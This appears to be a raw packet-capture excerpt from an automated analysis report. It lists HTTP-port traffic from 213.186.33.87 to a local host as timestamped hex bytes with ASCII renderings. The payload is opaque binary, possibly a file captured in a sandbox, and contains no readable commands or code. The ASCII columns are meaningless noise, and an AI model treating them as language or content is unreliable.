Aug 8, 2014 11:26:06.486413002 MESZ801032213.186.33.87192.168.1.13Data Raw: 0a 0a 90 0a 0a 0a a4 0a 0a b9 0a e6 fd 0a 0a 4d 0a 0a 0a f5 c7 01 1a 0a 0a 0a 9d 0a 0a 8d 8e 0a 0a 0a 0a 0a eb cf 0a 0a 0a 0a d4 0a 48 0a 0a 23 0a 92 0a 33 18 0a 0a b3 0a f3 0a 52 df 0a e5 0a e9 00 50 0a 0a 0a 45 0a 0a 0a 83 20 92 0a 0a 78 69 31
Data Ascii: MH#3RPE xi1#}dzO0XxI2BA.mm!-avPH4z(8f-$@DJgg&8(
266
Aug 8, 2014 11:26:06.486644983 MESZ801032213.186.33.87192.168.1.13Data Raw: 00 a6 d6 0a 0a 0a fe 0a 7a 0a 55 3e 0a e7 0a 46 0a 53 0a 38 0a 15 0a ea 0a 00 0a 0a 5f a0 d8 5c 21 1e 0a 0a af 0a 69 0a e3 96 d3 0a 0a 06 9a 0a 0a 0a 0a 4f 0a 99 f3 ec a0 04 0a 04 ee 0f 0a 0a 0a 0a 0a 0a 94 50 19 fc 0a 23 0a 85 0a 0a 0a 9d 0a b2
Data Ascii: zU>FS8_\!iOP#@lE;'iL}_g\;J?q{dB]#x>GP
268
Aug 8, 2014 11:26:06.486773014 MESZ801032213.186.33.87192.168.1.13Data Raw: a2 0a 0a 0a 2a 5c 2b 0a 0a 0a 48 0a 10 0a 7e af 0a 0a 0b b5 0a 6c a5 0a 0a 0a 0a 0a 0a 83 a9 0a e5 0a 24 09 0a 0a 0a 0a b1 0a 20 0a 95 23 b7 0a 0a 00 2d 0a 0a 0a 0a e5 0a aa e2 fd 35 0a 0a 0a 41 ed 0a 0a 12 0a 0a 0a 49 83 80 0a 0a 81 0a 4a 0a 0a
Data Ascii: *\+H~l$ #-5AIJyhF"HSWD- x^M"DvQLjXAyp-a.T
269
Aug 8, 2014 11:26:06.487101078 MESZ801032213.186.33.87192.168.1.13Data Raw: 0a 42 0a 0a 11 61 6f bb 0a 0a 0a 0a cb 0a 0a c7 0a a3 0a 34 0a b6 22 0a 00 0b 0a 4a 0a 52 0a 84 0a 0a 22 89 3b 0a 0a 26 ba 0a 0a 0a df 4f 60 a5 0a 44 0a 14 66 0a 0a be 0a 0a 0a 22 0a b1 ed 0a 16 67 03 0a 0a 0a 4a 0a 34 0a 79 34 ce 99 0a 7a 0a 0a
Data Ascii: Bao4"JR";&O`Df"gJ4y4z,_CF!dX/&|M|b5VZ@pd5wd_dp-m;tA
270
Aug 8, 2014 11:26:06.487118959 MESZ801032213.186.33.87192.168.1.13Data Raw: 33 0a 0a 0a 0a 0a c9 0a 18 0a b4 fd 8d 04 9f f7 05 0a 0a f8 0a 45 0a 0a 87 11 0a 0a bd 0a 0a 24 0a 5e 94 0a 0a 0a 09 98 4a 0a 0a 0a 14 0a c3 0a 11 0a 0a 9a 0a 0a 0a 4b 0a 0a 0a 0a 0a 82 0a e2 0f cf 0a 0a 2e c1 05 11 0a 0a b4 0a 0a 0a f5 23 59 0a
Data Ascii: 3E$^JK.#Y/s:|;@0>KCffCXlj`CXxP/\OU:NP4;
272
Aug 8, 2014 11:26:06.487520933 MESZ801032213.186.33.87192.168.1.13Data Raw: a7 11 0a a3 43 9e ec 0a 0a 0a 0a 3a 0a 54 0a 41 64 0a 14 0a 0a b4 73 0a ac 0a 0a 0a 4b 63 ac 3d 0a ed 78 95 0a 0a 7d 1f 0a 9c 0a 18 f6 e9 9d 3a 24 1d 2c 62 0a 52 41 0a 25 0a 88 0a c6 20 cc 12 0a a1 ff 0a 0a 0a 0a 6d 11 8e 2e 64 0a 0a 0a f9 53 0a
Data Ascii: C:TAdsKc=x}:$,bRA% m.dSr."Jp^K(Y%+(=^|xp$,,o&U=?!FBi2HpgsQ=(]|~$>9
272
Aug 8, 2014 11:26:06.487637997 MESZ801032213.186.33.87192.168.1.13Data Raw: 0a 0a 0a 0a e1 0a 4c 0a 10 91 0a 1b 0a d6 0a 0a 0a 94 0a a3 0a 22 f2 0a 0a 0a 61 5e 25 e8 0a 0a 97 0a 41 0a e8 d8 b8 41 0a 20 0a 71 64 0a 0a 0a 0a 54 0c 8f f2 a0 7d 0a 0c 10 38 0a 0a 0a 47 0a 0a 0a d5 4e 5f 07 0a 27 80 54 0a 0a 0a 15 0a 4b f0 16
Data Ascii: L"a^%AA qdT}8GN_'TK@8 f~AS9#iI"w,8+1ji]K]LYD=|A3/2Mb
274
Aug 8, 2014 11:26:06.489393950 MESZ801032213.186.33.87192.168.1.13Data Raw: 84 59 f1 7d 0a 0a 2d 3c 44 0a 60 0a 02 0a 0a 25 5a 1f 0a 0a 0a 0e e2 0a ec 28 b6 0a 0a 0a b1 0a a9 18 0a 0a 7b 0a 70 0a 59 0a 0a 7a 0a 8d 91 79 0a 0a 0a f5 0a 05 0a cf 75 c5 0a 0a 49 68 9d 0a 0a 0a 50 0a 0a 0a d7 15 dc 50 0a 09 38 c0 9d f1 0a 0a
Data Ascii: Y}-<D`%Z({pYzyuIhPP80]//3bQKA&^0qJhV]sy _fcCF/p
275
Aug 8, 2014 11:26:06.489413977 MESZ801032213.186.33.87192.168.1.13Data Raw: 0a 0a 42 0a 00 82 e7 0a 0a 47 b3 e0 09 53 c7 22 0a 0a 0a 3c f5 f4 ae 24 86 7c 51 0a b8 88 0a 40 0a 0a 01 1c 86 0a 53 0a 0a 97 86 0a 54 0a 0c f0 0a 51 0a f3 7d 98 0a fd 05 0a 0a 0a 0a 7b 05 0a d5 76 d6 0a 0a 0a 04 0a aa 0a 0a e4 c3 22 82 eb 95 bc
Data Ascii: BGS"<$|Q@STQ}{v"wElRq4B+V-96M9Y?8|x GT0$Xn\1n@[qgb@
277
Aug 8, 2014 11:26:06.489423037 MESZ801032213.186.33.87192.168.1.13Data Raw: 00 ed d1 03 fd 0a 88 0a 32 0a fc 24 37 40 b0 75 0a 92 35 4d 0a 04 0a 74 db 39 0a 0a 42 64 97 81 0a 0a 0a 0a 61 0a 05 0a 20 3e a7 0a 0a cc 4d 0a 0a 0a 0a 41 0a ce 28 cf 0a 0a 0a 26 b8 88 0a 0a 20 0a 0a 0a 89 da 8a 07 0a 40 6a 49 fa 24 0a 09 0a 1b
Data Ascii: 2$7@u5Mt9Bda >MA(& @jI$#4FLJq`NH=`$982G?0P?M{8RKm'qD))KYL(Z
278
Aug 8, 2014 11:26:06.490514040 MESZ801032213.186.33.87192.168.1.13Data Raw: 4b 22 0a 0a f9 1e 26 0a 0a 0a 01 22 3a 0a b6 f7 12 02 74 30 a9 46 2f 0a 0a 0a 0f b6 c4 0a 0a 0a 0a 0a 98 0a 2a 0a 1d 0a 98 0a 0a 0a 0a 0a 0a 89 0a 1c d4 1c 0a 0a 0a 4d 0a 51 4b 0a 59 0a 0a 0a 42 be 4a 0a f8 0a 0a 0a b8 0a e4 0a 80 eb 0a 72 04 98
Data Ascii: K"&":t0F/*MQKYBJr}}v?1NyDBBC`@+N0dd }%Gs##{L`7<0);Y
280
Aug 8, 2014 11:26:06.490518093 MESZ801032213.186.33.87192.168.1.13Data Raw: a5 0a 0a 0a 84 0a 8b 0a e9 20 02 98 0a 9c 13 73 a7 ef 58 0a 0a a7 0a 07 0a 36 8e 0a 70 39 db bf ad 1e 0a 72 0a 0a 50 0a 74 0a 0a 68 c5 44 be 0a 28 92 e9 4d 0a 4a d2 a1 4b 39 7f 82 0a 74 0a 0a c7 18 fd a6 ea 0a 5d d4 f2 0a 0a 41 4a 0a 0a da 2f b2
Data Ascii: sX6p9rPthD(MJK9t]AJ/P4?W%=dO|0@AT~0Z+"<KQ{}t"S|$od'|efGx,h1P
281
Aug 8, 2014 11:26:06.490520000 MESZ801032213.186.33.87192.168.1.13Data Raw: 98 0a 0a 0a 7c 0a 0a d0 0a 0a 25 0a 63 0a 0a 0a 08 89 8e 0a 0a 0e ad 0a 06 0a 3d d3 0a 71 60 4d 7f 0a 40 0a b3 0a 21 0a 21 0a 4b 0a 0a 34 0a 0a 0a 27 9c 14 ad 0a 9b 0a af 20 0c 70 0a 46 52 81 25 0a 0a 75 0a 0a b0 0a e5 0a 0a d1 0a 28 0a 0a de b8
Data Ascii: |%c=q`M@!!K4' pFR%u({(( T{p4=\<`u&a3NC-MjoA@^!Y<Z@x#B}/$7o
283
Aug 8, 2014 11:26:06.490520954 MESZ801032213.186.33.87192.168.1.13Data Raw: 00 0f b5 ff 0a 0a 0a 0a 0a 0a 0a fd 0a 0a 0a 0a c7 36 0a 0a 48 d9 52 0a 8d 0a 46 a9 0a 3c f0 d9 f3 8e 0a 0a 0a 0a ea 85 0a 0a 0a 80 73 0a 0a 0a 0a 70 2e 0a 16 64 0a 0a 96 0a 0a 0a 3d c9 0a 0d 0a fe 74 40 0a c6 57 0a 0a 0a 40 0a 53 0a 0a 92 0a 0a
Data Ascii: 6HRF<sp.d=t@W@SCh`P6cU7:Ap{z!7Uul|<KfSP>!uZpFF1%RW(Q8'5kC*0+@9
284
Aug 8, 2014 11:26:06.490523100 MESZ801032213.186.33.87192.168.1.13Data Raw: 0a 0a 7c ce 0a 45 85 0a 0a 0a 7a 0a 0a 0a 0a 7f 17 0a 0a 0a 0a 89 1e 8d 5f 15 94 3a 82 db 8e c1 c8 0a 66 b4 1d 0a d0 0a 0a 0a 25 c0 0a 0a 0a 0a 0a c2 11 f1 f8 4e 2f 5a 67 0a 0a 0a 0a eb b3 0a 0a 5c 0a 14 0a 0a 69 0a 84 0a 0a de 0a 0a 04 0a 0a 1c
Data Ascii: |Ez_:f%N/Zg\ie LLaQ(HpCuU NZZGG*afo2:"\>|5e/'*g
286
Aug 8, 2014 11:26:06.490525007 MESZ801032213.186.33.87192.168.1.13Data Raw: bd 97 2c 0a 0e 0a 0a 0a e0 5c 0a 0a 0a 0a 7d 0a 0a 0a 92 74 3a 12 13 0a 9a b0 ae 88 98 10 e3 49 0a a1 70 0a 95 0a 09 0a 0a cc 5b 0a 64 0a ae 0a 0a 0a 0a 32 52 92 a1 2e 0a 0a 8e d5 50 0a 86 f3 7f 3f 0a 0a c7 85 0a 0a 0a 0a 82 0a 0a 52 0a 0a 0a 0a
Data Ascii: ,\}t:Ip[d2R.P?R 6|D,`[2?!!~=ksH&T";QLE|&&2\]K
287
Aug 8, 2014 11:26:06.490526915 MESZ801032213.186.33.87192.168.1.13Data Raw: 0a 52 0a 3d 4a 20 74 0a 09 0a 0a 0a 0a b4 0a 0a 0a 0a f0 76 0a ef e5 b9 5f 0a f5 c0 5c 0a 0a 0a b5 0a 4c 30 07 0a a6 0a ba 0a 0a 0a 0a 8a 0a 0a 0a 0a 0a 0a 0a 20 fb 0a 0a 67 30 2e d7 0a 20 d8 0a 52 0a 49 fd 0c 3a a3 e3 c1 0a d7 0a 0a 0a 0a 09 70
Data Ascii: R=J tv_\L0 g0. RI:px1,8$A9fF&O"?gRDXd,DJOe5WohL@3W32#%T9w
289
Aug 8, 2014 11:26:06.490529060 MESZ801032213.186.33.87192.168.1.13Data Raw: 28 cf 0a 0a 38 0a 0a 11 0a 0a 0a 0a 0a 0a f6 0a 0a 26 0a 0a 60 1f 91 0a 0a 7d a4 f8 58 de b3 52 0a 00 b8 07 8f dc c5 66 fc 0a 0a 0a 19 0a 0a 8c 0a 0a 0a 8d fc 40 22 89 52 c1 dd 94 53 19 0a 53 14 2b b2 e8 0a 10 51 93 19 0a fb 0a 0a ae 0a 0a 0a 0a
Data Ascii: (8&`}XRf@"RSS+QHQ7{/!5a}[n|Dz).TFGZ,D6Mhv
290
Aug 8, 2014 11:26:06.490684986 MESZ801032213.186.33.87192.168.1.13Data Raw: 80 44 0a f4 0a 0a e8 f1 52 65 c0 62 4e 53 00 00 00 00 e1 9b aa 00 00 00 00 00 91 31 cc 4c 4f 2c eb 44 ff 2f e9 4d 37 50 94 46 21 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii: DRebNS1LO,D/M7PF!1>/@1qE3mC/.LP,PQ6PGKOgH2/A6P671SAQ<
292
Aug 8, 2014 11:26:06.490694046 MESZ801032213.186.33.87192.168.1.13Data Raw: f3 f6 de 9e 0a 83 0a a5 f2 00 f1 a2 0a 0a 0a 0a 96 95 21 ff 64 56 e0 d0 27 0a 39 6c 66 21 a1 0f 0a 0a 60 7c 0a be c3 26 42 17 d4 0a 0a 0a 0a 80 64 e8 0a 0f 93 68 0a 79 0a 36 5b 0a 0a 0a cd 63 42 0a 1e 7f e0 0a 9d 7f 0a 0a b6 0a d3 0a 2e d1 31 87
Data Ascii: !dV'9lf!`|&Bdhy6[cB.1:WWV5["[ltt$$o2`zD^e|i>8``n}"<U.5dD
292
Aug 8, 2014 11:26:06.490699053 MESZ801032213.186.33.87192.168.1.13Data Raw: 18 0a e9 69 ab 0a 0a fc 5a 0a 64 0a 51 82 0a d7 f6 e1 86 0a 0a 0a d8 df 9b b8 05 89 21 0a 0a 0a 0a 44 29 87 f2 cb 20 c2 0a 2b 0a f2 0a f2 d3 72 7d 0a 29 0a 0a 32 0a 66 44 0a c8 e0 72 80 c5 0a f9 0a 0a 48 0a 85 0a 38 0a 73 0a 4b 0a 0a 76 0a 0a 0a
Data Ascii: iZdQ!D) +r})2fDrH8sKv&uh=$- 2t38vtV2F8|A.Q}eEJ#^nT*AUY,ud;e>sLHU
294
Aug 8, 2014 11:26:06.490703106 MESZ801032213.186.33.87192.168.1.13Data Raw: 0a 0a 4b 62 05 11 43 13 f8 97 0a 70 b9 cf 89 0a 82 9b 30 bd 40 c8 d8 f4 2d 0a ee 0a 5e a7 86 51 19 0a 0a c2 0a 0a fb 01 70 0a 0a 52 0a 0a 45 ab 0a b6 45 0a 1e d2 04 5c 0a 7b 0a 0d 0a 0a 0a 0a 1e 0a ef 52 3e 30 6a e5 36 65 9c 8c 0a 84 76 c2 62 c3
Data Ascii: KbCp0@-^QpREE\{R>0j6evbh<}YZV)4iy]F2ui0MeDAq5}i'k0tI6pD"WC4s
295
Aug 8, 2014 11:26:06.490892887 MESZ801032213.186.33.87192.168.1.13Data Raw: 47 0a 0a 0a 0a 3f 4a d7 10 23 0a d3 0a 83 0a 16 0a 80 0a 0a f1 09 0a 90 0a 82 0a a2 44 83 be bd f0 0a 63 58 fe 45 4f fc 0a 1a 0a b3 0a 27 b0 52 48 0a 65 a3 0a f5 00 d7 84 7c 89 0a d4 0a 0a 0a 04 4c 0a b5 0a b6 7a 0a 0a a0 0a b1 0a 09 3e 0a 9a 04
Data Ascii: G?J#DcXEO'RHe|Lz>$[XH!+#]5,D,^]'Js@$DZW*B 4NHGh_c"3DP
296
Aug 8, 2014 11:26:07.477032900 MESZ801032213.186.33.87192.168.1.13Data Raw: 82 e9 24 0a 0a 0a 0a 0a 2c dc 85 09 18 46 06 0a 7e 0a 0a 5a 0a 0a 01 fd 88 0a 09 0a 57 c3 1d 39 23 29 f5 11 0a 97 83 fd f4 77 cb ff 3e 0a a1 0a 09 0a 0a fc 43 0a c5 21 56 0a 23 d7 0a 4c d2 0a b4 84 dd ec 0a 0a 0a 00 d6 d9 8a 28 ef 2a c8 0a 0a 9a
Data Ascii: $,F~ZW9#)w>C!V#L(*1S3rsKNT}%00'D80PSE5.l$3QgeotA%+mlyg(Rd
298
Aug 8, 2014 11:26:07.477041006 MESZ801032213.186.33.87192.168.1.13Data Raw: 84 0a 0a 32 0a fe 0a a3 11 ae 03 7c 10 4c 0a d3 0a 0a 56 0a 3e 65 10 0a 0a 0a 0a 55 9f 0a 10 e4 0a 07 70 0e 0a 89 2b 5c 0a fd 1d c7 77 4b 88 c0 0a 0a 00 0a 0a 6c 0a 57 0a b4 30 0a 51 9c 0a 54 b8 0a 0a 4c 0a 11 0a 53 0a 0a ab 0a df 0a 09 0a 45 0a
Data Ascii: 2|LV>eUp+\wKlW0QTLSELto1P^YE@H!mA\B":<yu -1Bdc n2mpgb$U{)b*!!JO`
299
Aug 8, 2014 11:26:07.477044106 MESZ801032213.186.33.87192.168.1.13Data Raw: 98 95 b4 4f 0a 0a 09 08 60 4b 06 80 2a 93 46 0a ba 0a e5 0a 36 0a 18 a6 5c ad 50 94 f5 61 0a bb 2f 76 7c a7 0c 7c 0a f9 0a 0a 0a 84 bc 44 6e 0a 9f 0a 5c d5 e1 16 24 d0 7d 0a 0a ee 88 0a 88 0a 1b 44 0a 0a 0a 0a 0a 0a 0a 69 09 54 4d f9 f6 6f 27 0a
Data Ascii: O`K*F6\Pa/v||Dn\$}DiTMo'L0` 'P\[z?'xJ+H+6kpw>JaP<Ws(;,,V6e
300
Aug 8, 2014 11:26:07.477046967 MESZ801032213.186.33.87192.168.1.13Data Raw: b7 07 60 0a 0a 09 0a a4 0a 35 20 3c a1 c5 5b 2c 0f 62 1f 3e 64 82 f4 d2 0a 0a 8a 0a 10 c7 2a 75 0a 2e 0a 78 0a 44 0a 0a 0a 0a 0a 0a 5a 2a 41 0a 0e 0a 0a 61 0a a2 0a c9 08 f9 f8 44 25 61 0a 48 0a 46 0a 0a 0a f4 0a 9a 44 40 7c 09 28 2d 4a 40 2c 0a
Data Ascii: `5 <[,b>d*u.xDZ*AaD%aHFD@|(-J@,P2}n=X?-&3 zc,H wey(u:nTpB6nP(~@HZK(G@
302
Aug 8, 2014 11:26:07.477049112 MESZ801032213.186.33.87192.168.1.13Data Raw: 79 0a 1b 0a 53 b6 0a 0a 0a 0a 0a 0a d3 0a 0a 0a 0a 0a 0a 1d e4 ae c1 f8 0a 86 b7 19 76 43 55 0a a9 91 0c 47 f9 0a 0a 18 0a 0a 0a 0a 68 0a 0a 0a 0a 0a 0a 0a 0a 0a 61 0a b0 0a a6 0a 08 74 8f 0a f7 fe 26 6f 0a 89 84 0a 46 0a 33 0a 0a e9 0a 0a 0a 0a
Data Ascii: ySvCUGhat&oF3&H~K#HMP5('{i$`11jC@!F`jZ
303
Aug 8, 2014 11:26:07.477200985 MESZ801032213.186.33.87192.168.1.13Data Raw: 50 30 45 3b 08 9d 0a 0a 0a 0a 43 0a 0a 9a 0a 0a 0a 0a 80 0a 3a 70 0a 71 60 0a 00 65 53 2a 04 0a 81 4b dc 0a 3b 0a 0a 0a 0a 0a 0a a8 0a 0a 0a 0a 0a 0a 0a 0a 0a 8d 0a 0a e1 ce 0a c2 e9 0a 09 0a be 4c e7 19 ed 0a 0a 0a 0a 0a 13 0a 16 0a 0a 0a 0a 0a
Data Ascii: P0E;C:pq`eS*K;LXO{B.H`;\~p&0U3H";-x\E=PZ,#PIV
305
Aug 8, 2014 11:26:07.477205992 MESZ801032213.186.33.87192.168.1.13Data Raw: e0 35 bd 07 5d 0a 0a 0a 0a 9d 0a f4 1f 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 05 30 00 03 a2 0a 0a ee 7a 1c 98 0a f3 4a 92 0a 1f 0a 0a 56 0a 0a 0a 0a 62 0a 14 ea 0a 3d 0a 5c 0a 08 0a 49 a6 0a 30 aa a2 04 e8 e2 0a c4 0a 74 0a 9b 0a 0a 0a 0a 9c 0a 0a 0a 0a
Data Ascii: 5]0zJVb=\I0tqhj>YZC8P -e2kV\QFHk""G2
306
Aug 8, 2014 11:26:07.477207899 MESZ801032213.186.33.87192.168.1.13Data Raw: da 8b d5 83 45 38 0a d7 0a 0a 0a 98 0a 64 0a 0a 0a 0a 0a 0a d0 45 38 09 0a 3f b6 a9 0a 02 f0 43 96 0a fe 0a 88 0a 0a 0a 15 8d 0a 0a 0a 0a e1 0a 0a 0a 0a 11 0a 0a 4e 0a 0a 0a 0a 0a 0a 86 97 0a e1 04 0a 36 c2 0a a8 5d 0a 0a 14 df a9 0a 0a 0a 0a e3
Data Ascii: E8dE8?CN6]%n[ZKC*uRyPz"eTF%D]/!E!C[~q&
308
Aug 8, 2014 11:26:07.477272034 MESZ801032213.186.33.87192.168.1.13Data Raw: 33 96 70 0a cf db ba 71 0a 0a 0a 0a 3a 0a 0a 72 0a 0a 0a 0a fc 0a 0d 0a d7 0a 0a 0a 68 c5 2e 17 e9 1c e5 8d e4 0a 42 0a 9e 42 5d 1e 0a e5 0a 8b 0a 0a 22 0a 6a 0a f5 a1 08 0a 0a 0a 0a d9 82 0a 61 0a 2d 00 62 0a 51 0a 7e 0a 0a 92 0a 0a 0a 0a 0a 0a
Data Ascii: 3pq:rh.BB]"ja-bQ~Oq3fWLJftn1t~7 }!j)vZ(=).0vuG|PL_$\7z;
309
Aug 8, 2014 11:26:07.477458000 MESZ801032213.186.33.87192.168.1.13Data Raw: 09 0a 0a 0a 39 01 0a 0a 0a 0a 0a 0a 0a 0a 28 0a 0a 51 c6 3d 0a 0a 0a 0a 3c e2 6a b9 77 ca 71 b9 0a 1c 96 cc 0a d5 0a 7b 0a 0a 0a 0a f3 0a 01 0a e3 0a 9a 0a 3e b2 5a 38 0a ea 03 0a 58 e2 1c 0a 08 0a 06 9b 0a 0a 0a 49 0a 0a 54 0a 0a 41 b2 b8 6d 0a
Data Ascii: 9(Q=<jwq{>Z8XITAmXGuSTg0 Qku-#&GNaN)xH:m"_jIR`95+4
311
Aug 8, 2014 11:26:07.477463007 MESZ801032213.186.33.87192.168.1.13Data Raw: 0a 0a 0a 40 0a 28 0a b7 0a 0a 0a 0a 0a 5b 0a 0a 26 0a 28 66 0a 73 0a b9 0a 56 8b 0a c2 a2 33 50 e1 4e e6 0a 0a 0a 47 4a 0a 0a 0a ba 0a 0a 0a 0a 0a 0a b2 0a 0a 50 0a 19 27 3d 0a 04 3b 0a 49 0a 4c 0a 52 31 64 a5 46 0a 0a 0a 0a 0a 0a 0a 19 0a 06 0a
Data Ascii: @([&(fsV3PNGJP'=;ILR1dFt`bSHif!"]B-su'H=X=L"xZ [i
312
Aug 8, 2014 11:26:07.477467060 MESZ801032213.186.33.87192.168.1.13Data Raw: 0a 0a 0a d3 0a 0a b0 f3 88 16 a3 cc 0a 0a e0 0a 07 1a d7 3a 35 e1 41 0a 0a 31 13 0a cb 01 0a 89 0a 60 0a 53 0a 0a cf 0a 0a 0a 96 0a 95 0a bc 78 88 c0 0a 91 0a 18 c3 ce 38 0a 76 0a 0a 08 0a 0a 0a 10 64 f1 0a 0a 7c 0a 0a 0a 0a 10 7a 5c 97 04 0a 0a
Data Ascii: :5A1`Sx8vd|z\)v^0p>$u#W@<JfLy>x&@5qo$%KA,L_~,49Dv0Z},93&
314
Aug 8, 2014 11:26:07.477468967 MESZ801032213.186.33.87192.168.1.13Data Raw: 0a 0a 7e b3 0f 56 04 8c d8 0a 5d 00 82 c6 61 77 0a 09 41 39 0a 24 0a d7 74 0a 0a 0a 0a 90 0a c8 0a e3 0a d1 0a bc 0a 0a 0a 3a 5d 2b 8d e9 41 5f 73 3e 5f 72 88 9a 31 f4 8a 21 66 d5 0a 0a 54 0a 21 b1 0a 8d 0a 78 0a 0a 0a 0a 0a 0a 95 ac 0a 69 0a 21
Data Ascii: ~V]awA9$t:]+A_s>_r1!fT!xi!>}#)L1]k(ofk4LwXGT\!z6M?@!If$iXg54tN5|)KtD1
315
Aug 8, 2014 11:26:07.477472067 MESZ801032213.186.33.87192.168.1.13Data Raw: 0a 43 0a 61 0a f9 0a 79 0a 0a 18 cd b9 0a 1d 82 0a 27 3b 04 a4 0a 0a 4e 07 03 4f 0a 78 0a 0a 41 0a 0a 0a 05 94 53 2c 0a 0a bc c4 0a 0a e7 57 b4 0a 91 c6 28 0a 0a 0a 57 0a e3 07 0a 0a e5 0a 0a 0a 8c 0a 0a 05 a8 0a 0a 0a 0a 0a 0a 46 83 66 0a 47 a2
Data Ascii: Cay';NOxAS,W(WFfG8IIF\Zw~@twK}Tji"xho6@n(Qi2R''s
317
Aug 8, 2014 11:26:07.477576971 MESZ801032213.186.33.87192.168.1.13Data Raw: bd 24 0a b3 af 20 0a 0a 0a 0a 47 39 a9 f4 0a 9f 0a ea 4e 4e 0a 4f f4 d9 f2 f1 c9 29 0a 0a 8c 0a 0a 9e 0a 0a 0a 94 0a 0a f3 0a 0a e8 e1 fa 0c 0a 90 1c 24 a2 0a cd 0a 0a db d3 4f 07 0a 0a 58 0a 0a 0a 0a 44 0a d6 0a 0a 9c 0a 0a 0a 0a 0c 0a 23 c3 5f
Data Ascii: $ G9NNO)$OXD#_VIa\Q<kmNK=PFG:#w:^A
317
Aug 8, 2014 11:26:07.477655888 MESZ801032213.186.33.87192.168.1.13Data Raw: 9e 0a 0a 0a 0a 5a 5e 0a 8f 0a b3 0a e4 0a 65 e2 84 0a 86 0a 6a ef 8c 51 90 0a 0e 21 09 0a 0a 0a 0a 0a 0a 0a 0a 0a 63 0a 01 0a 0a 0a 2c c2 0a 98 0a 19 88 df 6e 0a 2a 75 69 f8 fc 00 3f 0a 88 0e 0a 06 0a 0a 15 0a f2 0a 0a 2e 0a 0a 0a 0a e6 0a 0a 0a
Data Ascii: Z^ejQ!c,n*ui?.Wf:R/!G!:D<bm7dYhCjLG~T`g=A'~G\}<!)yb!1} nD
319
Aug 8, 2014 11:26:07.477659941 MESZ801032213.186.33.87192.168.1.13Data Raw: 0a 0a 0a 0a 89 0a 0a 0a 0a b3 0a 0a fc 0a 71 1c 04 15 f8 21 3a ab 24 0a 0a 3e d5 28 1e 0a 70 48 0a 0a 0a 0a 0a 84 97 be d1 0a 0a 0a 0a 0a 0a 0a ae 0a b0 15 0a 3c 12 fa 0a d0 cc 7d 2a 0a 0c 0a 5e 70 5c e2 0a 0a 0a 0a 0a 0a 0a 0a b3 02 d3 4d 0a 0a
Data Ascii: q!:$>(pH<}*^p\M\={2iZ'+o:FHN7M2a[<\B(`FaB 3RqZd&AvP
320
Aug 8, 2014 11:26:07.477663994 MESZ801032213.186.33.87192.168.1.13Data Raw: c7 0a 0a a1 0a 6e 0a 0a 6b 0a c2 0a 72 b4 0a 0a 0b 0a 0a 75 80 28 e8 50 cb 33 20 78 36 0a 41 0a 57 0a 0a 0a 0a 0a 4c 0a c4 83 41 98 1b 0a 01 0a 3b 0a de 0a 49 28 c2 86 0a 81 14 ea 65 0a fa dc 7e 26 02 0e 0a 0a 22 0a f3 91 09 0a fb 0a 44 0a 0a 0a
Data Ascii: nkru(P3 x6AWLA;I(e~&"Dr-`Hj8R($I, hDL&JdL \$`,@(Hj"%7bbgXw&E
321
Aug 8, 2014 11:26:07.477665901 MESZ801032213.186.33.87192.168.1.13Data Raw: 0a 0a 66 0a 0a 0a 0a 0f 0a 0a 6b 0a d8 0a 3a 52 2f 0b 0a 0a 40 0a d1 0a b8 4d f8 0a 02 27 eb 80 0a 0a 11 0a 0a 0a 0a 88 b0 0a 44 0a 0a 0a 9c 0a 46 d0 0a 67 2f 1c 0a 0a 31 0d 57 0a 6c 0a 27 0a 00 c4 fc 0a 0a 62 0a 0a a8 78 2e f5 80 e9 2b a3 f8 8c
Data Ascii: fk:R/@M'DFg/1Wl'bx.+o=kmENo0wH@raC!'brv=DBt&!B0 ~v
323
Aug 8, 2014 11:26:07.477752924 MESZ801032213.186.33.87192.168.1.13Data Raw: 0a 8d 0a 9b 0a 0b ed 6f 5e 0a 7c 99 69 0a 31 c5 0a 0a 2d 0a 0a 0a 0a 0a 00 0a 24 0a 33 00 79 0a 0a 0a 0a 01 01 bb fc 0a 3a e4 40 0a 0a 0a 35 0a e2 0a 68 2e 38 08 d7 0a da 0a 0a 0a 0a 75 b6 0a a8 0a 0a 0a 42 39 70 0a a4 0a 0a 32 d4 08 7b 38 be da
Data Ascii: o^|i1-$3y:@5h.8uB9p2{8!uXF5\9|QiQH"wD4!>G8udF`n!Fu
324
Aug 8, 2014 11:26:07.477823019 MESZ801032213.186.33.87192.168.1.13Data Raw: c3 04 0a 0a 0a b3 f7 13 9f 0a 3c 8d 0a 3b fd a2 89 8f ae de 0a c0 0a 0a a5 0a 0a 0a 21 72 24 19 ae 42 0a be 0a 2d bb da cb f4 44 0a 0a 0a fb 0a 0a 0a 0a 12 0a 0a 0a 0a 07 0a 0a 50 32 11 0a 93 08 b2 0a 0a 0a b5 f6 0a 0f 0a c8 ca 0a 83 34 2f f8 b9
Data Ascii: <;!r$B-DP24/-#[v@8~A_'<f RB"++F<#FM-n>4@
325
Aug 8, 2014 11:26:07.477833033 MESZ801032213.186.33.87192.168.1.13Data Raw: 0a 90 64 0a 0a 40 0a 0a 0a e0 d0 7c 0a 17 0a cb 0a 0a 8b 0a 18 0a 0a 0a 0a 40 0a 0a a9 e8 d0 aa 5f 0a 0f 0a 0a 46 d3 39 0a 0a 0a 0a 05 68 31 24 0a 0a a3 0a 0a 42 0a c2 0a 03 5c 0a 0a 0a 0a c8 8d f9 0a d3 f6 2b 0a 40 2a 1f 49 0a cb 0a 15 1f 0a 0a
Data Ascii: d@|@_F9h1$B\+@*I6u~/*3v;G%%lvi9[Wt4PmS cIK}]z d-DNLWA?A'X]
327
Aug 8, 2014 11:26:07.477835894 MESZ801032213.186.33.87192.168.1.13Data Raw: a2 1c 0a f5 76 96 0a 0a bd 20 ca 80 a2 1c af 12 21 6c 0a 0a 0a e2 0a 0a f8 0a 0a 92 0a 0a 35 08 f3 2a 0a 94 0a 20 0a 21 94 9f 83 0a 0a 0a af 0a 0a 0a 0a f4 0a 0a 64 0a cf 44 0a 5c 5e 0a 0a 0a a2 f0 a2 b5 0a 0a 0a 19 28 62 a3 71 50 2c b0 00 2d 2e
Data Ascii: v !l5* !dD\^(bqP,-.g&P[1|Bros""`G7AS1rXX|;|pDiGHU+j:5
328
